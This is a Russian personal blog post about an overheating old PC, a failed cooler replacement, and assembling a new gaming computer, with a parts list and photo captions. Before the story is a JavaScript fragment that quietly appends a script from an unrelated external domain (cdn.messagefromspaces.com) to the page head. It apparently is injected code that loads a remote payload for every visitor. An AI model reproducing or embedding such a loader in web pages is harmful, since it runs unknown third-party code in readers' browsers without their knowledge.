, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Перед вами – грустная история с хорошим концом о том, как я компьютер менял. Где-то примерно 2 года назад во время прохождения второго «Ведьмака» мой старый стационарный комп начал надрывно пищать. Особенно, в самые острые моменты. А летом в жару и подавно. Ясное дело, процессор перегревается. Новый кулер покупать и ставить мне было весьма лениво. Я проявил смекалку и поставил рядом с открытым корпусом настольный вентилятор на прищепке для дополнительного охлаждения. Спустя какое-то время предпринятых мер стало очевидно не хватать. Я проявил смекалку еще раз и поставил второй вентилятор-прищепку. Ещё через несколько месяцев компьютер стал тормозить, визжать и перегреваться даже при запуске Хрома. Даже перенос системы на SSD не помог. Пришло время ставить новый кулер. 

После трезвой пятницы, набравшись сил и решимости, я взялся за разбор компьютера. Это был просто пиздец какой-то! Пылища была во всех вентиляторах, особенно досталось видеокарте, оттуда клочья вылетали. Но нужно было снять кулер, а снять его нормально было нельзя. Потому что он был прикреплён «удобными» пластмассовыми защёлками, которые никак не отщёлкивались и не выкручивались, туды их в качель. Применив крепкие матюги снаружи и некрепкое пиво внутрь, я отколупал эти защелки, нечаянно сломав две из них, всё-таки от старости пластмасса стала хрупкой, и кулер был освобожден.

«А кто у нас здесь такой мудак?» — подумал я и сбегал посмотреть на себя в зеркало. Дело в том, что тут же я обнаружил нечто потрясающее: с ножки кулера не был сорван пластик, поэтому она не прижималась металлом к процессору и охлаждение было так себе. Десять лет компьютер продержался и вот устал. После устранения этого факапа ему стало лучше, но ненамного. Стал чуть меньше тормозить и всё. Тем более, что сломанный кулер был привязан розовой ленточкой к корпусу и опасно болтался из стороны в сторону. Пришлось купить новый хороший кулер с винтами.

Через неделю я начал замену кулера. План был простой: вытащить видеокарту, снять старый кулер, поставить новый и всё собрать обратно. Но в этот раз факир был пьян с самого утра и фокус не удался. Компьютер категорически отказывался включаться. Один раз жужукнул и затих. А я опечалился и немедленно выпил еще. Остаток вечера провёл за игрой в «GTA IV» и тяжелых раздумьях.

Все раздумья привели к двум решениям: Маша покупает себе ноутбук – все равно она давно уже его хотела, а я себе приобрету новый компьютер. Конфигурацию я подобрал вот такую:

  • Процессор Intel Core i7-7700K
  • Материнская плата GIGABYTE GA-Z270X-GAMING 5
  • Видеокарта Palit GeForce GTX 1060 6 ГБ
  • Память Kingston HyperX Fury Black DDR4, 2 штуки по 8 ГБ
  • Винчестер Samsung 850 PRO 256ГБ (перетащил из старого компьютера)
  • Корпус ZALMAN Z11 PLUS
  • Блок питания Corsair AX860 860W (тоже перетащил из старого компьютера)
  • Лицензионная Windows 10 Pro

Целую неделю лежало это сокровище у меня запакованным. Потому что было страшно начинать всё это собирать с нуля. Но деваться некуда. Сначала прикрутить материнскую плату, потом воткнуть процессор, нацепить на него многострадальный кулер, вставить винчестеры, память и видеокарту, привинтить блок питания и воткнуть все-все-все провода. «Вроде бы, всё готово» — подумал я и нажал кнопку питания. Ничего не произошло. Сука, только что собранный компьютер не включался никак. Даже после нескольких нажатий кнопок и подтыкания проводов! Попил пива на балконе, покурил и вспомнил, что процессор как-то неловко установился, что-то было неправильное в его установке. Оказалось, что я не закрепил его на специальную защёлку, поэтому он не был подключён к материнской плате. Быстро всё исправив, я снова нажал на кнопку питания.

Компьютер зажужжал и засветился! Материнская плата переливалась красными огоньками, а верхний вентилятор — синим цветом. А я станцевал победный танец. Потому что наконец-то справился!

Далее уже было всё просто и понятно. Windows 10 установил минут за 20, потом перенёс старые винчестеры, которые — тьфу-тьфу — не погибли со всей инфой. Настройка, установка, всякая мелочь.

Большой компьютер — большая мощь. И теперь на нём можно играть не боясь, что он перегреется или затупит. Тем более, что к нему телевизор подключён и геймпад от X-Box. Я даже растерялся, что мне теперь выбрать. «Ведьмак 3» или Mass Effect 3? В эти игры можно загрузить сейвы от предыдущих частей и завершить две трилогии. Или новый Deus Ex? А может, ужасы в хорошем качестве? Или какой-нибудь Crisys 3? Дивный чудный мир открылся передо мной, и я с горящими глазами вглядывался в названия игр в моей обширной коллекции. Жаль правда, что покупка PlayStation 4 откладывается на неопределённый срок, ну да ладно.

P.S. Отдельный сюрприз мне сделал мой широкоформатный монитор. В нём не оказалось никакого цифрового входа! Такой большой, а такой глупый, как не стыдно. К единственному выходу HDMI я подключил телевизор, а для монитора купил адаптер DisplayPort → VGA. И всё наконец-то получилось, как я и хотел.

Самые главные комплектующие
Крутой корпус ZALMAN Z11+
Кулер
Старые винчестеры с важной информацией
Установка материнской платы
Установка кулера и блока питания
Ура, заработало!
Современный BIOS
Лицензионная Windows 10 Pro на флэшке
Установка Windows 10 за 20 минут
А вот так компьютер светится в темноте
Адаптер DisplayPort → VGA

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.